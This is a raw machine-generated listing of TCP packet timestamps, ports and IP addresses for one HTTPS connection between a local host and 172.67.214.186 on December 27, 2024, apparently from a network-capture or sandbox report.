                                                                                                                                      Dec 27, 2024 10:22:05.313395023 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.313415051 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.313493967 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.313493967 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.313523054 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.313612938 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.319046974 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.319061041 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.319128036 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.319144964 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.320122957 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.324724913 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.324762106 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.324790001 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.324804068 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.324830055 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.324846983 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.329727888 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.329744101 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.329796076 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.329812050 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.329860926 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.329860926 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.493030071 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.493046999 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.493129969 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.493163109 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.494668961 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.498759031 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.498775959 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.498831987 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.498840094 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.502835035 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.503658056 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.503674984 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.503726006 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.503736973 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.506127119 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.509480000 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.509497881 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.509577036 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.509591103 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.510409117 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.514697075 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.514712095 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.514795065 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.514807940 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.518156052 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.520448923 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.520463943 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.520526886 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.520545006 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.522928953 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.526074886 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.526096106 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.526144981 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.526155949 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.526181936 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.526201010 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.531088114 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.531106949 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.531147957 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.531157017 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.531183004 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.531202078 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.694536924 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.694567919 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.694729090 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.694740057 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.694783926 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.699645042 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.699661970 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.699724913 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.699738026 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.702887058 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.705262899 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.705279112 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.705338001 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.705347061 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.706899881 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.711034060 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.711060047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.711105108 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.711117029 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.711142063 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.711158991 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.716357946 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.716373920 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.716425896 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.716437101 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.718815088 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.721939087 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.721955061 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.722002983 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.722011089 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.722214937 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.726952076 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.726968050 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.727030993 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.727040052 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.727051973 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.727077961 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.732708931 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.732729912 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.732796907 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.732809067 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.732837915 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.732855082 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.895961046 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.895977974 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.896040916 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.896094084 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.898065090 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.901736021 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.901756048 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.901843071 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.901875019 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.901961088 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.906780958 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.906795979 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.906864882 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.906896114 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.907984972 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.912333965 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.912348986 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.912390947 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.912417889 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.912435055 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.912445068 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.917917013 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.917934895 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.918001890 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.918034077 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.918210030 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.923387051 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.923413038 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.923459053 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.923490047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.923506975 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.925230026 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.929102898 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.929119110 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.929166079 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:05.929193974 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:05.929241896 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.092721939 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.092745066 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.092848063 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.092905998 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.094209909 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.097263098 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.097279072 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.097356081 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.097383976 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.098165035 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.103038073 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.103060007 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.103132963 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.103163004 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.106422901 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.107990026 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.108006001 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.108072042 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.108097076 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.110152960 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.113759041 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.113775015 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.113842964 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.113862991 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.114419937 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.119057894 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.119075060 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.119126081 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.119143009 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.122417927 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.124665976 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.124687910 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.124737978 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.124756098 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.124775887 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.124794006 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.130408049 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.130425930 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.130498886 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.130518913 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.134155989 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.294054985 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.294079065 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.294230938 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.294270992 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.294334888 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.300148010 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.300168037 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.300278902 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.300312996 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.302160978 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.304608107 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.304625034 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.304704905 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.304733038 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.306174994 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.309678078 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.309695005 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.309771061 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.309814930 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.310455084 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.315224886 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.315242052 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.315309048 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.315351009 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.318149090 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.320542097 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.320564032 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.320611954 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.320641041 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.320657969 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.320677042 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.326232910 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.326252937 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.326343060 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.326370001 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.326432943 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.331948042 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.331969023 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.332086086 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.332149029 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.334481955 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.495528936 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.495551109 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.495603085 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.495662928 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.495685101 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.495721102 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.500206947 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.500222921 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.500272036 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.500314951 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.500360012 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.506263018 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.506278992 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.506325960 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.506355047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.506390095 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.510726929 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.510740995 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.510792017 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.510821104 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.510869026 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.516599894 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.516623974 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.516702890 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.516731024 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.516788960 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.521862030 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.521889925 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.521940947 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.521964073 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.521981001 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.522171021 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.527652979 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.527673006 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.527775049 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.527802944 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.530342102 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.533246040 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.533267021 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.533328056 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.533348083 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.533361912 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.534181118 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.697624922 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.697649956 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.697814941 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.697860956 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.699013948 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.702157021 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.702179909 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.702258110 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.702265978 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.707510948 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.707551956 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.707607031 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.707618952 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.707632065 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.707662106 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.713207960 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.713243008 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.713329077 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.713355064 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.714122057 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.718238115 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.718259096 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.718359947 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.718400002 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.720148087 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.723743916 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.723767042 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.723833084 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.723843098 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.726156950 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.729195118 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.729213953 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.729274035 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.729284048 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:22:06.731193066 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:22:06.734918118 CET44349745172.67.214.186192.168.2.4
